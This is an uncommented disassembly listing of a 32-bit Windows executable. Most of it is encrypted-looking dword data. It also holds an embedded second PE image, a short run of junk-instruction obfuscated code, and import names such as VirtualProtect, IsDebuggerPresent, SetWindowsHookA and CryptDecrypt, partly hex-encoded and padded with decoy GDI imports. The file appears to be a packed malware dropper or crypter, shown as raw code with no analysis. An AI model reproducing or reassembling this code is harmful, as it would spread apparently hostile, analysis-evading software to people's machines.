dd 0A71360B5h, 0C8F02932h, 0BA359487h, 0E939800Ah, 2F3233C2h
dd 73741BEDh, 0F3DBE081h, 0C379DE4Ch, 0A0070B9Ch, 819E4BC3h
dd 99DC5F80h, 30AD7CC9h, 0C0643D56h, 0C553B2F0h, 519715C0h
dd 82F554FBh, 59679ADDh, 121D6D3Bh, 0D44CE691h, 0E65791F6h
dd 8F21C856h, 93362512h, 5570D7CBh, 3CA74B85h, 40F9C5A5h
dd 99D20C81h, 0A4D12211h, 0C6DF4D77h, 20CEB5E6h, 0D4FB5F91h
dd 0B1EE5DADh, 3F1F4501h, 0CB2D1109h, 3AE9B699h, 0C2650786h
dd 1AF6215h, 5FF7843Fh, 13C2A3FAh, 0B8A0AF75h, 0BF29428Dh
dd 0C9027CE4h, 67BBD6B7h, 79471BB3h, 9E837E01h, 0C6C566D0h
dd 9624E583h, 376A32FAh, 9AE1E2E3h, 0DAC72ECCh, 2F0D9E3Eh
dd 0D340E4F2h, 0B35FDE11h, 0DD093255h, 0A18D40D0h, 26FCA5F9h
dd 0BE47E857h, 0AAA9A6D2h, 20F3AD42h, 65877B4Ch, 0DFC773FCh
dd 0EAAD85E0h, 28E0E4BAh, 401B5DCEh, 7B554980h, 402F5159h
dd 0C0BA7359h, 0D387396Dh, 1C69325Bh, 0A1DFA026h, 0CED86DCFh
dd 7D89B95Dh, 7602B34Ah, 0A2D389B2h, 5F9D2ECh, 0BB4CF50Ah
dd 893A3BB0h, 766CDE1Dh, 79CB0C5Dh, 44F9A8D9h, 6769A8B3h
dd 13F58361h, 0CF434230h, 183CF3AAh, 7EB6E43Bh, 7B2D0841h
dd 0E909D4E1h, 3ED018ABh, 538CEE57h, 96459395h, 0BA38D13Ch
dd 1DA8A9F6h, 0D5EE7F9h, 0B5A190BEh, 3F8BE9B6h, 0F1CC447Bh
dd 0F3F9EFDFh, 0B6E42443h, 83D36881h, 2996AD8Ah, 6C026365h
dd 0BA52B66Eh, 0E9E6758Fh, 860876D9h, 2C4DCEF6h, 3323C569h
dd 6AE4AE75h, 0EEB0D3E0h, 0DCFE02B9h, 0DB1FFB7Fh, 2130C556h
dd 7F58CA1Eh, 0BFDCDAC4h, 0DCAD97CAh, 92C6D62Eh, 7AA97B36h
dd 17EA8E6Dh, 8F488CFAh, 3D46714Ah, 9DB0C352h, 0B947F623h
dd 86C939E1h, 0D098EF5Dh, 0A8411EEDh, 7CD8ACF5h, 3318155Ch
dd 5A379C77h, 832D395h, 81E162F2h, 0F50CA846h, 87EE06F9h
dd 0FCB0906h, 0EDDD47D2h, 8F013100h, 162A78A1h, 9590238Dh
dd 0A0980D38h, 281B76B2h, 614E59Eh, 200E9968h, 0DAD13FA1h
dd 12F4AA72h, 0F0DF0FF3h, 53CF0C65h, 8195CBE0h, 57FC92A6h
dd 21202AF0h, 4B7E6C91h, 0E443EF76h, 17905D66h, 288FD132h
dd 2C3B3FBh, 0C37E055Fh, 8CE0FA98h, 6D2973C7h, 0F2E9EAD4h
dd 0A2A75AF1h, 8AC9B063h, 0BED51B5Dh, 0DE413D22h, 0AE8F9419h
dd 5281BE5Fh, 0B3E9958Fh, 0EBE5A187h, 9B95740Bh, 932683F8h
dd 0E1966B98h, 0CA5AD49Ah, 8F2B0DC0h, 0C97A32E8h, 9FDC358h
dd 0A7A5C3CEh, 4F4C7AAAh, 0FFAE50CAh, 24FB6D53h, 0B84D3DFEh
dd 0F1745734h, 0FE59D480h, 34461D89h, 580EFBA3h, 0CEAD4Fh
dd 9A9C922Eh, 650BF88Eh, 0B4673B51h, 0E4EFC0DCh, 1E900D21h
dd 4A12D7F9h, 0CEDCFE40h, 0E4B77A64h, 6CE66A4Dh, 0CB57FA26h
dd 60DB4B83h, 76357348h, 3969BDF8h, 55F18FD6h, 63AAD1A4h
dd 6AF35A8h, 0AB9C79AFh, 4251FB0h, 74C05A7Ah, 6F51FB0Bh
dd 7A5BE25Dh, 0BD889614h, 0D9D7F223h, 3565EF15h, 4AAE509Ah
dd 0D8D41851h, 0D0235851h, 65537C45h, 13D51DF3h, 0F76712D6h
dd 8C22DAB4h, 2FFB9044h, 0D4AE4EA4h, 0ABA2BC95h, 6E54D173h
dd 74777A6Fh, 14A7F302h, 6F6BBC25h, 0AE960819h, 67CF71D0h
dd 0DB737409h, 1C959128h, 7CB446C0h, 0F632AB28h, 0FF934B0Ch
dd 4009C047h, 8955FB38h, 553C7BABh, 1DC7ECFBh, 0D6E051F0h
dd 0C8743C31h, 0C68C0343h, 87C1E053h, 0B0F71FDBh, 0FED8AC87h
dd 0F84F2202h, 0C3405105h, 173515BAh, 67693BD0h, 0CE56D07Dh
dd 2E27D7D2h, 79B26CDAh, 0F6C4BDFAh, 197F7A8h, 69B013D4h
dd 5135A621h, 5055DEC6h, 75F87A51h, 6D5451F6h, 8561899Ah
dd 0B2E3AE4Dh, 9E4424D0h, 6FF27AFFh, 1655A9C2h, 0D009296Fh
dd 0E91989C9h, 327B1311h, 0BB73A262h, 0E0183354h, 0EC1CC221h
dd 0D71F9419h, 4086E1C0h, 7CCF4686h, 5AE019E3h, 4059C0FCh
dd 0E3721365h, 534C8E18h, 0C9573864h, 0CAD5D485h, 758D67B5h
dd 0EDDF94B3h, 0E9D95A06h, 0C644B548h, 7B20A2FDh, 43F38610h
dd 88DAAA06h, 518E77BFh, 0AA03FE0Eh, 0D481E6DAh, 0D797E50h
dd 4D29837Ah, 0BF94EC48h, 2838F191h, 0E45AE775h, 493B88A5h
dd 61EFA68h, 0F16207C8h, 0E8462FD1h, 3548B77Ch, 6E011036h
dd 4758F03h, 99376F30h, 0FFF914A7h, 0FDAA21E0h, 0DEFC9E5h
dd 0F0D03A1Eh, 32175966h, 1D467284h, 0ED0A5F4Dh, 186C9F25h
dd 0ECECE33Eh, 398E7B0Bh, 0CD99EF52h, 4D1EA7FAh, 8FC86E8Bh
dd 0E5FB80CCh, 0AE697040h, 0EEABE3A5h, 5B1E88F9h, 0AA355778h
dd 124A1BB0h, 3DA77CCFh, 3746666Bh, 0B3980065h, 0C0B5BEF2h
dd 15EB22CEh, 98E0488h, 0FFCB676Eh, 0A0921429h, 90A0D38Ch
dd 0DBDE631Ah, 6155AA83h, 0AB019F0Ch, 0FE16F94Ch, 0A3B248AEh
dd 0D2752B1Bh, 55E557B1h, 0A45D260Fh, 8470F186h, 0EB3172A6h
dd 0EA2733C8h, 648440CFh, 4955F4E1h, 9081B022h, 8DC52186h
dd 1087B102h, 0A017E205h
dd 0AA9B8EDFh, 793CE53h, 4E97C4D9h, 81110443h, 0E238D119h
dd 4AD0CBF9h, 9B25579Dh, 0F98B697Bh, 49D1911Eh, 0B07450BDh
dd 0D338333Fh, 36F302Ch, 0ADBE6502h, 151BF1FEh, 1508359Ah
dd 54916E98h, 39519023h, 90034784h, 29B6D60h, 3EA9FB39h
dd 26A6E845h, 9EDBDCE9h, 6D04B9F4h, 58E9307Bh, 0F6FE65CFh
dd 0C5F308BFh, 0FE03EDC0h, 6055C42Ah, 5116A29Ch, 1E75B59h
dd 82CEAD59h, 29CAD588h, 50C6758Ah, 0C5BD77DCh, 0A0AFA65Fh
dd 516BE65Ch, 7D742276h, 3414865Fh, 35E1AF1Bh, 809A20C2h
dd 6BBE2091h, 0B719BD79h, 17EF1851h, 0C591881Fh, 1C169A7h
dd 0C5E54E1Bh, 0C3C8B169h, 0F3ED9084h, 22219AF5h, 0CC8DEC2Dh
dd 8058DD7Fh, 0DC29F0A6h, 0E2103BF1h, 42F5C51Ch, 0B0521B33h
dd 0E6464A8Ch, 0E1F047Ah, 428CB755h, 0B0E8F62h, 0D4063C07h
dd 78h, 26h dup(0)
dd 3174h, 3064h, 3 dup(0)
dd 32FEh, 30B8h, 3 dup(0)
dd 342Eh, 30F8h, 3 dup(0)
dd 34D2h, 3120h, 5 dup(0)
dd 3182h, 3194h, 31ACh, 31C0h, 31D4h, 31E8h, 3204h, 3212h
dd 321Ah, 322Eh, 3248h, 3258h, 3266h, 3278h, 3288h, 32A2h
dd 32B4h, 32C2h, 32D4h, 32E6h, 0
dd 330Ah, 3318h, 332Eh, 3348h, 3356h, 336Ch, 3380h, 3394h
dd 33A8h, 33BEh, 33CEh, 33E0h, 33F2h, 3404h, 3414h, 0
dd 3438h, 3444h, 345Ah, 346Ah, 3476h, 348Eh, 34A8h, 34BCh
dd 34CAh, 0
dd 34E0h, 34FAh, 350Ch, 351Ch, 3534h, 3548h, 3560h, 3572h
dd 3582h, 3590h, 35A8h, 35BCh, 35D4h, 35E6h, 35F6h, 3606h
dd 361Ah, 362Ah, 363Ah, 365Ch, 0
dd 4E52454Bh, 32334C45h, 4C4C442Eh, 0
aVirtualprotect db 'VirtualProtect',0
align 4
dd 65530000h, 6E614874h, 49656C64h, 726F666Eh, 6974616Dh
dd 6E6Fh, 65470000h, 72745374h, 54676E69h, 45657079h, 4178h
dd 65470000h, 6D754E74h, 46726562h, 616D726Fh, 4174h, 65470000h
dd 646F4D74h, 48656C75h, 6C646E61h, 4165h, 65470000h, 69725074h
dd 65746176h, 666F7250h, 53656C69h, 69746365h, 416E6Fh
dd 65520000h, 69466461h, 7845656Ch, 0
aSleep db 'Sleep',0
align 10h
aIsdebuggerpres db 'IsDebuggerPresent',0
align 4
aGetprocessprio db 'GetProcessPriorityBoost',0
dd 69460000h, 6552646Eh, 72756F73h, 416563h, 54550000h
dd 69676552h, 72657473h, 0
aIsbadstringptr db 'IsBadStringPtrW',0
dd 75420000h, 43646C69h, 446D6D6Fh, 574243h, 72540000h
dd 746E4579h, 72437265h, 63697469h, 65536C61h, 6F697463h
dd 6Eh, 50746547h, 41636F72h, 65726464h, 7373h, 78450000h
dd 72507469h, 7365636Fh, 73h, 54746547h, 61657268h, 6D695464h
dd 7365h, 65470000h, 6D6F4374h, 646E616Dh, 656E694Ch, 41h
dd 656C6544h, 72436574h, 63697469h, 65536C61h, 6F697463h
dd 5355006Eh, 32335245h, 4C4C442Eh, 0
aShowwindow db 'ShowWindow',0
align 4
dd 654D0000h, 67617373h, 786F4265h, 69646E49h, 74636572h
dd 41h, 616F7242h, 73616364h, 73795374h, 4D6D6574h, 61737365h
dd 576567h, 65440000h, 676C4466h, 636F7250h, 41h, 6E65704Fh
dd 646E6957h, 7453776Fh, 6F697461h, 416Eh, 6F4C0000h, 654D6461h
dd 6E49756Eh, 65726964h, 577463h, 73490000h, 6C616944h
dd 654D676Fh, 67617373h, 4165h, 6E550000h, 69676572h, 72657473h
dd 73616C43h, 5773h, 64440000h, 65755165h, 654E7972h, 65537478h
dd 72657672h, 0
aImpqueryimea db 'IMPQueryIMEA',0
align 4
aSetwindowshook db 'SetWindowsHookA',0
dd 65520000h, 74736967h, 6C437265h, 57737361h, 0
aDialogboxparam db 'DialogBoxParamW',0
dd 654D0000h, 67617373h, 786F4265h, 577845h, 65520000h
dd 74736967h, 69577265h, 776F646Eh, 7373654Dh, 41656761h
dd 44470000h, 2E323349h, 4C4C44h, 6E490000h, 74726576h
dd 6E6752h, 65470000h, 686E4574h, 6174654Dh, 656C6946h
dd 73746942h, 0
aSettextalign db 'SetTextAlign',0
align 10h
aStartdocw db 'StartDocW',0
align 4
aPlayenhmetafil db 'PlayEnhMetaFileRecord',0
align 4
aGetsystempalet db 'GetSystemPaletteEntries',0
dd 65530000h, 42494474h, 54737469h, 7665446Fh, 656369h
dd 65530000h, 74654D74h, 6E675261h, 0
aChord db 'Chord',0
aAdvapi32_dll db 'ADVAPI32.DLL',0
align 4
dd 72430000h, 45747079h, 506D756Eh, 69766F72h, 54726564h
dd 73657079h, 57h, 70797243h, 65724374h, 48657461h, 687361h
dd 704F0000h, 65536E65h, 63697672h, 5765h, 624F0000h, 7463656Ah
dd 6E65704Fh, 69647541h, 616C4174h, 576D72h, 72430000h
dd 47747079h, 72507465h, 6150766Fh, 6D6172h, 72430000h
dd 41747079h, 69757163h, 6F436572h, 7865746Eh, 4174h, 72430000h
dd 44747079h, 76697265h, 79654B65h, 0
aCrypthashdata db 'CryptHashData',0
align 4
aIsvalidsid db 'IsValidSid',0
align 4
dd 65470000h, 6D614E74h, 65536465h, 69727563h, 6E497974h
dd 416F66h, 65530000h, 746E4574h, 73656972h, 63416E49h
dd 416Ch, 75420000h, 54646C69h, 74737572h, 69576565h, 614E6874h
dd 41656Dh, 704F0000h, 68546E65h, 64616572h, 656B6F54h
dd 6Eh, 70797243h, 636E4574h, 74707972h, 0
aInitializesid db 'InitializeSid',0
align 4
aAdjusttokengro db 'AdjustTokenGroups',0
align 10h
aReporteventa db 'ReportEventA',0
align 10h
aCryptdecrypt db 'CryptDecrypt',0
align 10h
aLookupsecurity db 'LookupSecurityDescriptorPartsA',0
align 10h
dd 72430000h, 53747079h, 72507465h, 6150766Fh, 6D6172h
dd 0
dd 496C9E67h, 0
dd 36C0h, 1, 2 dup(4), 3698h, 36A8h, 36B8h, 11A8h, 11ACh
dd 1719h, 11A2h, 36CDh, 36DDh, 36EFh, 3701h, 10000h, 30002h
dd 736E6562h, 7974726Fh, 6C6C642Eh, 6C6C4400h, 556E6143h
dd 616F6C6Eh, 776F4E64h, 6C6C4400h, 43746547h, 7373616Ch
dd 656A624Fh, 44007463h, 65526C6Ch, 74736967h, 65537265h
dd 72657672h, 6C6C4400h, 65726E55h, 74736967h, 65537265h
dd 72657672h, 3Bh dup(0)
dd 1000h, 26h, 3152301Eh, 32FB31A8h, 34743398h, 372C358Ah
dd 38353758h, 399938F7h, 3AC83A7Ah, 3B52h, 41Ch dup(0)
dword_406A9C dd 905A4Dh, 3, 4, 0FFFFh, 0B8h, 0 dd 40h, 8 dup(0)
dd 0F0h, 0EBA1F0Eh, 0CD09B400h, 4C01B821h, 685421CDh, 70207369h
dd 72676F72h, 63206D61h, 6F6E6E61h, 65622074h, 6E757220h
dd 206E6920h, 20534F44h, 65646F6Dh, 0A0D0D2Eh, 24h, 1Dh dup(0)
dd 4550h, 2014Ch, 496C9E5Ch, 2 dup(0)
dd 10F00E0h, 5010Bh, 1C00h, 600h, 0
dd 2 dup(1000h), 3000h, 400000h, 1000h, 200h, 4, 0
dd 4, 0
dd 5000h, 400h, 0B2CDh, 2, 100000h, 1000h, 100000h, 1000h
dd 0
dd 10h, 2 dup(0)
dd 3000h, 28h, 1Ch dup(0)
dd 7865742Eh, 74h, 2000h, 1000h, 1C00h, 400h, 3 dup(0)
dd 60000020h, 6164722Eh, 6174h, 2000h, 3000h, 600h, 2000h
dd 3 dup(0)
dd 0C0000040h, 72h dup(0)
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
add esp, 0FFFFFFBCh
pusha
mov cx, 9C5Dh
not ecx
lea edi, ds:0FFADA247h
mov dx, 80E9h
push 40104Ch
mov edi, ecx
mov ecx, 213083F9h
mov cx, 1DFCh
lea ecx, ds:7549DE2Ah
sbb ecx, 97942BBh
not ecx
lea ebx, ds:10F1A4Dh
mov edi, esi
retn
; ---------------------------------------------------------------------------
dw 0CEC1h
dd 7071B91Dh, 0E7812D1Eh, 0DF966D2Bh, 4BDF45C7h, 816E7265h
dd 0BB3B11F2h, 16EDBB6Dh, 0DA33853Ah, 0DF81D1F7h, 652FBAA3h
dd 0DEF7DBF7h, 45C7DFF7h, 336C65E3h, 0C1D7F732h, 0F9330CE3h
dd 759BC8BFh, 0E745C789h, 6C6C642Eh, 0DBC1DE33h, 3DC18100h
dd 0F7156E8Ch, 16CFC1DBh, 0D8DD1F7h, 394E1860h, 0EB45C6h
dd 0B966CE87h, 0EEC1C184h, 0C1CE8905h, 458D05E1h, 0F7F033C8h
dd 33F189DBh, 91D8DDCh, 0BF114A81h, 8164FCACh, 0CB59AFBFh
dd 50D98B95h, 0F70ECEC1h, 9D1C1D7h, 995C158Dh, 0D3813100h
dd 0F51C3E04h, 8B90FD33h, 0BBB66FEh, 0A9158DA4h, 87F5351Ch
dd 81D6F7CEh, 0F7E258E3h, 90CE8955h, 4497BF66h, 1D8DF28Bh
dd 1FECAD77h, 0D78BCE89h, 0DFA1BE66h, 90FBE9BAh, 8DDA89D5h
dd 0C3C1DF45h, 0D5E28103h, 0B9EFA9BCh, 6DB20EDDh, 0B353DA81h
dd 0CF8BD16Fh, 441B3FBEh, 0B5BF50A9h, 0F7FFC409h, 11BF66DFh
dd 513D8DD5h, 816DC0FCh, 0E8FAF7EEh, 0A415FF7Fh, 0B9004030h
dd 95DDDF6Ch, 8D18CBC1h, 0A6CB9D1Dh
_text ends
; Section 2. (virtual address 00007000)
; Virtual size : 00006000 ( 24576.)
; Section size in file : 00006000 ( 24576.)
; Offset to raw data for section: 00007000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_rdata segment para public 'DATA' use32
assume cs:_rdata
;org 407000h
dd 0F7D18BBFh, 0F1BF90D6h, 81C112FAh, 179791DFh, 1ECAC1C1h
dd 0DEF7D9F7h, 0E7C1C833h, 9CBB6610h, 158D90ADh, 572204Dh
dd 85A198BBh, 0FFDAF7D5h, 40308015h, 33F63300h, 50D6F7D8h
dd 0B8BED633h, 339138CDh, 66CE89FAh, 813B62BFh, 97FBDDDAh
dd 90CF8B6Dh, 0E53DCA81h, 1D8DF548h, 6DBF4211h, 661EE9C1h
dd 66FF43BFh, 90649DBEh, 1A56BB66h, 0F82F0D8Dh, 0EB817900h
dd 0CF830000h, 0D033FA8Bh, 45C7D6F7h, 676552C8h, 22D28169h
dd 337F9893h, 0C7D2F7FAh, 7473CC45h, 0ABBA7265h, 89D126CDh
dd 0BABF66F1h, 0C7F2876Ah, 6553D045h, 0DBF77672h, 0CA33DAF7h
dd 321BB966h, 57C0358Dh, 8D904FF1h, 21B27115h, 33D13375h
dd 86B966D9h, 81D38781h, 290B7BE1h, 0B87AB9C1h, 3D8DB559h
dd 815A8919h, 0D610BA90h, 0DBF1525h, 666D9263h, 0C7C1FEBEh
dd 6369D445h, 0EB815065h, 1564975Ch, 0C381F033h, 95C0916Eh
dd 0B5FD29BBh, 16E1C16Fh, 0F38BD2F7h, 4561358Dh, 45C755C8h
dd 636F72D8h, 77EE8165h, 0BFE10E71h, 95F43CBEh, 0E7C1D9F7h
dd 1D1C114h, 0FE8C158Dh, 0D8DEF92h, 0CDD7557Bh, 0DC45C766h
dd 0CA817373h, 7135B75Fh, 0ACCBC0BAh, 0D6EE814Fh, 8DD5B440h
dd 0B46F53Dh, 66FA87F5h, 8D6417BFh, 1BD61935h, 0DE45C649h
dd 0CDBA6600h, 2E9C10Eh, 0F833F781h, 81907938h, 860371F1h
dd 9C358D95h, 87A163A2h, 90D7F7CBh, 8B1DD6C1h, 0B9D68BD9h
dd 0EF905D84h, 0C71158Dh, 1D8DFD2Ch, 0CD8643BEh, 0D7F7DD33h
dd 308815FFh, 0CFC10040h, 18E3C11Bh, 0DEDAD781h, 0CA875F82h
dd 4E55BF66h, 3D8DDFF7h, 0DFFB66B5h, 840FC00Bh, 0A6h, 0DEF7DF89h
dd 0F706C3C1h, 0EBEA81D6h, 0F72F8CEDh, 0DEF790D7h, 0D033CB89h
dd 62D8E381h, 0E0BEF55Fh, 0C155E0DAh, 0D6F70AD1h, 0AB9A99BAh
dd 1D8D900Fh, 2FEEB413h, 8D07E6C1h, 55EFBF15h, 66D2F725h
dd 812250BBh, 0C6E3DACBh, 8CD2F7CDh, 0E334B9C8h, 0F981797Bh
dd 0DD566EEAh, 0E281D9F7h, 0EDBB988Ch, 0D8DDBF7h, 0D13F9EA2h
dd 0E40ACB8Bh, 34850Fh, 0C3C10000h, 0B9DAF719h, 0A57B794Dh
dd 26B3BE66h, 0C2A5BA66h, 0DAB9006Ah, 0F7A160ADh, 17D7C1DEh
dd 309815FFh, 0C9C10040h, 0C1DFF71Ch, 0DF8915E3h, 0ED9BFE81h
dd 0F8833165h, 0BED78B05h, 0C90AEB3Ah, 0E681D333h, 6FE20B87h
dd 7EE41D8Dh, 0DFF795CDh, 9368D633h, 66000002h, 0BE7310BAh
dd 215159CDh, 458FD7F7h, 0C1F287ECh, 0D1F71ACEh, 0C109EEC1h
dd 0F79004EAh, 1FDEC1D2h, 0B912E1BAh, 8135BF55h, 0DAC13544h
dd 47F98114h, 0C7293EBDh, 699CF045h, 0CBC1AFFBh, 6DCE8109h
dd 0F76D7DA9h, 52F389DFh, 0C103CBC1h, 0BF6615C7h, 0DBF73F99h
dd 6537E6B9h, 66D9F741h, 8B4E69BAh, 0DFF750F7h, 907EBA66h
dd 331EC1C1h, 0F7DA33CBh, 0C2BB66DAh, 0DC15FF52h, 66004030h
dd 0F73C5CBEh, 0BADE89D3h, 0D50844D8h, 6605D2C1h, 0C12DB4BFh
dd 0D8D16EEh, 8FA9B911h, 53ED6335h, 22C981AAh, 8DCDC74Dh
dd 301F873Dh, 0C1DAF7F5h, 60BE08CAh, 0C1958CCEh, 458909DBh
dd 33D6F7F4h, 17D2C1F6h, 8A0E8EBEh, 4D9C1AFh, 0F4D18190h
dd 81ED02C0h, 0ABBEC7FAh, 90F2891Fh, 8BBEFE87h, 3395F646h
dd 15D7C1CEh, 18A164h, 0D7810000h, 5561F3CDh, 0C703D8Dh
dd 3D8D5FC6h, 15CB7FC1h, 0C181D1F7h, 0D5F20E59h, 0DDFDDFB9h
dd 30408BD5h, 8256C181h, 51B96F90h, 8D1FF499h, 7261EF35h
dd 0F7DA8B81h, 1ED1C1D1h, 1273358Dh, 70FFCFC1h, 96E68102h
dd 33D5CFE0h, 0F7DD33DCh, 61BB66D3h, 50CE3398h, 6BFFB89h
dd 8D4FE0A1h, 38DF370Dh, 50C9810Dh, 0F7413D01h, 0BFEE81D9h
dd 90EF84D0h, 0BA2783BFh, 8DD93395h, 50E1B515h, 3D8D9095h
dd 0B1551B28h, 0D2C1D1F7h, 33F78B10h, 90CA81FBh, 0F7CFE38Fh
dd 240C7DBh, 2D2D2D2Dh, 2B1FBF66h, 0D37ABE66h, 0EAC1F033h
dd 0F7D13301h, 0A5C781DEh, 0C1BFE2F6h, 15FF0FCBh, 403068h
dd 0CE5FB966h, 0A696B966h, 0D78BD2F7h, 840FC00Bh, 0FFFFFE00h
dd 60BCBF66h, 0EA81F733h, 1F931576h, 0BB66E08Ah, 0D381F7D3h
dd 95F6D5BAh, 606C0D8Dh, 0FA870F8Ah, 0F281D987h, 815DECECh
dd 3312BB66h, 0BA26BF66h, 5FDF8190h, 0C155B0FAh, 0D78111EBh
dd 556218B2h, 383CBF66h, 0D533D6F7h, 6690CA33h, 0F712CABBh
dd 0C1F733DBh, 0FC3308C8h, 3319CAC1h, 7CFC1F4h, 0CC4F358Dh
dd 0D9873FF6h, 0CA33E08Ah, 5105EB81h, 358D15EBh, 692DEF87h
dd 0F708C8C1h, 0CC09B9DAh, 0BF663D68h, 0DE897149h, 88D8E681h
dd 35B9496Ah, 0F76139B6h, 89E08AD1h, 8DD9F7D6h, 2F9B9F0Dh
dd 52A3BB19h, 4589CD8Fh, 95B966F8h, 0C1F23382h, 64BF1BC1h
dd 66ED9F36h, 0C1EC0DB9h, 8D901FE3h, 2D3FBD35h, 66D43355h
dd 87C7B6BFh, 0F7DBF7D3h, 90D833DBh, 0EB39358Dh, 358DB526h
dd 9FAE87EAh, 0FB071D8Dh, 0D689B959h, 2D70F281h, 0CB8BC54Eh
dd 0D833DE89h, 12B96658h, 0EA0D8DF0h, 815FD00Bh, 5492B9F2h
dd 2408F5Dh, 0FF33D9F7h, 0AF70BB66h, 0BE0ED9C1h, 0EFDAB837h
dd 89FC458Dh, 0B9D3F7D3h, 49150914h, 89DBF750h, 0F7FE33FEh
dd 8D406AD2h, 0EC0EC53Dh, 4134BED5h, 0EFC19FC3h, 0F7D1F704h
dd 18DEB9DFh, 0B868ED94h, 0C100000Eh, 0C8330EC6h, 0F712C1C1h
dd 79BA66D1h, 68CF334Ch, 401B88h, 0EBA386B9h, 903D8D15h
dd 0F7695955h, 66F38BDFh, 0B974C9BAh, 57AD778h, 6AF14CBAh
dd 0FFDBF705h, 40307015h, 19CBC100h, 0BF66DFF7h, 5DB9B73Fh
dd 6695B1D1h, 8B0194BEh, 4AF381CAh, 90EFA794h, 0CAC1DEF7h
dd 81D9F710h, 6C9A4EF3h, 7ABB6681h, 0E8158DE6h, 66415564h
dd 0F7E89EB9h, 33B990D3h, 0C15FBFD4h, 0F18B10CFh, 0C11EE3C1h
dd 458D1DE3h, 0F8DF81C4h, 0C1CDDE80h, 358D0ED3h, 0DFA77943h
dd 68h, 0E2D181F0h, 0BE4FAA58h, 0C546D22Ah, 6619CBC1h
dd 335FB1BEh, 6AF033FCh, 0CBBA6601h, 19EFC1BBh, 14DEBF66h
dd 0CE89DEF7h, 0BE66DEF7h, 158D1A09h, 0D147B572h, 0D9F7006Ah
dd 1B9F233h, 6AF57FF9h, 8DD83300h, 4AD6D73Dh, 281D8D11h
dd 89B52B6Bh, 0DA8150F9h, 14C7A23h, 0E856C0B9h, 81D6F77Fh
dd 0BDC74BF7h, 0F815FFCFh, 66004030h, 330B6ABEh, 66CE8BD0h
dd 0F72681BFh, 6DBE66DBh, 0D7899096h, 870CC9C1h, 99F281CBh
dd 90BD62D3h, 8D08C6C1h, 35F2F43Dh, 6D1C17Dh, 0B76D60BFh
dd 5DBC1CDh, 0EE7F158Dh, 0C781CDFBh, 0D5AC1FABh, 49EEBF66h
dd 0C1C0458Dh, 0BA660FE7h, 0DD338491h, 54ECCF81h, 56BFEDE7h
dd 50951314h, 0DBF7D7F7h, 0BE66F733h, 0E2C1182Ch, 0F7006A04h
dd 1AD7C1DFh, 43783CBBh, 8D006A2Dh, 331171Dh, 81D9F7F5h
dd 4FDB86C6h, 0BCBF6671h, 0BF3D8D2Bh, 6895D069h, 8003h
dd 0D6F7D387h, 158DDFF7h, 0CDD4835Ch, 0FA89DBF7h, 0BBC475FFh
dd 19010749h, 0BE66DD33h, 0D6C1B0F7h, 0F599BA09h, 0EFC16DCBh
dd 2415FF19h, 33004031h, 81DEF7D0h, 0AE17C7E2h, 0C1FF338Fh
dd 8D901CC3h, 86F15535h, 1F358D7Fh, 0C1D10643h, 358D04D6h
dd 9FCAE272h, 4B71C181h, 0FE8B55BAh, 0C190FE87h, 358D14D7h
dd 715686A7h, 5836BA66h, 8C8B358Dh, 0DBF78FF9h, 0C1EC458Dh
dd 0D9F71DD1h, 0E4C5BA66h, 0BE66D9F7h, 6A9EFDh, 0F718E6C1h
dd 19EEC1DFh, 0CB33146Ah, 0DBBED6F7h, 5015CE9Dh, 0A207F181h
dd 0CEC14FC4h, 1687BB1Ah, 75FF8568h, 0CFFE81C0h, 811901BBh
dd 103105E6h, 32BE6641h, 2815FFA8h, 66004031h, 87951ABEh
dd 1CFABED9h
dd 0D1F74D35h, 13DB33BFh, 81CF8B29h, 7D3C7ECBh, 0F18B9055h
dd 6617E2C1h, 0B9F367BAh, 0B540799Eh, 409F681h, 0EFC16DB3h
dd 0BAC68102h, 90796500h, 0EFC1CF8Bh, 1A158D12h, 89C93967h
dd 2FB966FAh, 0E7DF8168h, 8D857779h, 0BE66BC45h, 0DD33D53Ah
dd 0C118E9C1h, 0D7F712EEh, 0D50B966h, 66CF8950h, 333DB0B9h
dd 68CDh, 0FB330080h, 4CED3D8Dh, 0B9667528h, 0BE66EFDBh
dd 3D8DAC69h, 3FFD1F77h, 0E27AB966h, 0C3C1D2F7h, 0C075FF17h
dd 0DDE97BBBh, 15E2C1CDh, 0C3C1DE87h, 0F9E0BE01h, 0D8D95E9h
dd 4FEBB5ACh, 680168h, 17DEC100h, 711B3D8Dh, 0DA814D54h
dd 0EDBDFF8Ch, 0F833C933h, 1562BF66h, 0F2FD31BBh, 0C475FF6Dh
dd 0DAF7DF33h, 0C9C1D533h, 2FB96610h, 262FBE0Bh, 85BB894Eh
dd 8BCD867Fh, 2015FFCAh, 8D004031h, 0C5265C0Dh, 0EC158D55h
dd 666527BEh, 8D9C2CBBh, 0E68D391Dh, 0F98B906Dh, 8ED4EA81h
dd 0CA87C175h, 6DBFF333h, 337518A1h, 0B0BE66F2h, 0CBCB81DBh
dd 90156682h, 0C4A5FB81h, 0B96DA6h, 0F74F9FE8h, 0EB868D3h
dd 0F1890000h, 4F323D8Dh, 0F83315EDh, 6E0EBB66h, 48580D8Dh
dd 335415F5h, 18C7C1FBh, 5EBBD987h, 87EDE963h, 1B8868FBh
dd 0BE660040h, 0D2F7F2FEh, 6ACC33h, 0ACBED78Bh, 89CFE0CBh
dd 9C158DF2h, 0F799644Ah, 1F23BBD1h, 0D7C19539h, 17C3C107h
dd 0BE66016Ah, 0BBBB58A9h, 33B5707Fh, 0BEDFF7F6h, 0BF8B3147h
dd 0E2C1006Ah, 746EBE02h, 0FA8715E4h, 0ACE9CEBEh, 0D7EF81EDh
dd 0BBDFA159h, 5FED0567h, 82F7FF81h, 75FF4FD4h, 0BAD2F7BCh
dd 6FDA0667h, 0D387CA89h, 0CB87D733h, 0FF1FE6C1h, 40310015h
dd 4C48300h, 22D3BF66h, 69B9CE89h, 0C1D5B955h, 9EBA0DC3h
dd 66EDA3E4h, 818007B9h, 0AA2FA7D7h, 90DEF7CDh, 84F5EABBh
dd 1ABE6615h, 0B6158DE7h, 8D95F367h, 99CCA41Dh, 90D7F79Fh
dd 871DD6C1h, 86158DFBh, 0C13944ECh, 0ECB906D1h, 8BEDC3C2h
dd 0E9C961CEh, 0
dd 9C0D0104h, 0C7492656h, 0CCFC2A17h, 0C123F96Ah, 0A59EF7B9h
dd 4B3523F7h, 55DEDAE6h, 94BA73F5h, 97871B6Dh, 2DE933EDh
dd 27E36726h, 0E7A50123h, 8CDB09A9h, 707CABCEh, 41CD48FEh
dd 0B39DF87Ch, 55F960BCh, 0A8479F17h, 0BD322D87h, 558B01EEh
